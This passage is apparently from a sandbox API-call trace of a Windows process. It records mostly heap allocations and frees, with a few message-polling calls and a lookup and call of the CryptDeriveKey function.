| out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0156.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0156.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0156.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0156.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0156.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0156.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0156.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0156.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0156.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0156.413] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0156.413] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0156.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0156.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0156.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0156.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0156.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0156.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0156.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0156.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0156.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0156.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0156.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0156.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509f8 [0156.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0156.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.545] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0156.545] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87610) returned 1 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0156.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: 